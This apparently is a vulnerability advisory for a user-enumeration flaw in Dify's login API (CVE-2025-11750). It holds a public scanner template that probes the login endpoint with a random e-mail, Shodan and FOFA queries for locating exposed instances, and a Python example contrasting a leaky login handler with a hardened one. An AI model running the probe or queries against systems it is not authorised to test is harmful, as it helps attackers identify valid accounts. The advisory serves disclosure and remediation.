CVE-2025-11750: Dify - User Enumeration via "Account not found" Message

Date: 2025-08-01 | Affected software: Dify | PoC: public

Vulnerability description

A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts.

PoC code [public]

id: CVE-2025-11750

info:
  name: Dify - User Enumeration via "Account not found" Message
  author: Kazgangap
  severity: medium
  description: |
    A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts.
  reference:
    - https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11750.md
    - https://github.com/langgenius/dify/issues/24323
    - https://github.com/langgenius/dify/pull/25369
  metadata:
    verified: true
    vendor: langgenius
    product: dify
    shodan-query: http.favicon.hash:"97378986"
    fofa-query: icon_hash="97378986"
  tags: cve,cve2025,langgenius,dify,user-enum,vuln

variables:
  fake_email: "{{to_lower(rand_text_alphanumeric(16))}}@{{to_lower(rand_text_alphanumeric(16))}}.com"
  fake_password: "{{rand_text_alphanumeric(16)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<title>Dify")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /console/api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{fake_email}}","password":"{{fake_password}}","language":"en-EN","remember_me":true}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "account_not_found", "message")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 400'
        condition: and
# digest: 490a0046304402205fed6b24f4b5e1155d7b2e830369469afa3f59f98d56adc2daab74845431095f022050a2a5f494def09ee3dc09e7dd650beadec488391c03c9b64aa61aebbafa1f61:922c64590222798bb761d5b6d8e72950
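The defect the template probes is a login handler that answers differently depending on whether the e-mail is registered. The following added Python example (not Dify's code; the in-memory user store, salt and error codes are constructed for illustration) shows that leaky pattern beside a hardened handler that returns the same status, the same body and does the same password-hash work on both paths, plus the check a reviewer would run against each.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory user store for this example; not Dify's account model.
# Passwords are stored as salted PBKDF2-SHA256 digests.
def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = b"example-salt-0001"
USERS = {
    "alice@example.com": _hash_password("correct horse battery staple", _SALT),
}
# Dummy digest used when the account does not exist, so both paths do equal work.
_DUMMY_HASH = _hash_password(secrets.token_hex(16), _SALT)


def login_vulnerable(email: str, password: str) -> tuple[int, dict]:
    """Leaky handler: a distinct error for an unknown e-mail (the CVE-2025-11750 pattern)."""
    stored = USERS.get(email)
    if stored is None:
        return 400, {"code": "account_not_found", "message": "Account not found."}
    if not hmac.compare_digest(stored, _hash_password(password, _SALT)):
        return 400, {"code": "invalid_email_or_password", "message": "Invalid email or password."}
    return 200, {"result": "success"}


def login_hardened(email: str, password: str) -> tuple[int, dict]:
    """Same status, same body and same hashing cost whether or not the account exists."""
    stored = USERS.get(email)
    known = stored is not None
    # Always derive a digest so the unknown-account path is not measurably faster.
    candidate = _hash_password(password, _SALT)
    match = hmac.compare_digest(stored if known else _DUMMY_HASH, candidate)
    if known and match:
        return 200, {"result": "success"}
    return 400, {"code": "invalid_email_or_password", "message": "Invalid email or password."}


def responses_distinguishable(login_fn) -> bool:
    """Reviewer check: does a known and an unknown e-mail (wrong password) yield different responses?"""
    return login_fn("alice@example.com", "wrong") != login_fn("nobody@example.com", "wrong")
```

Timing equalisation here only covers the hashing step; a real deployment should also confirm that rate limiting and logging treat both paths alike.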
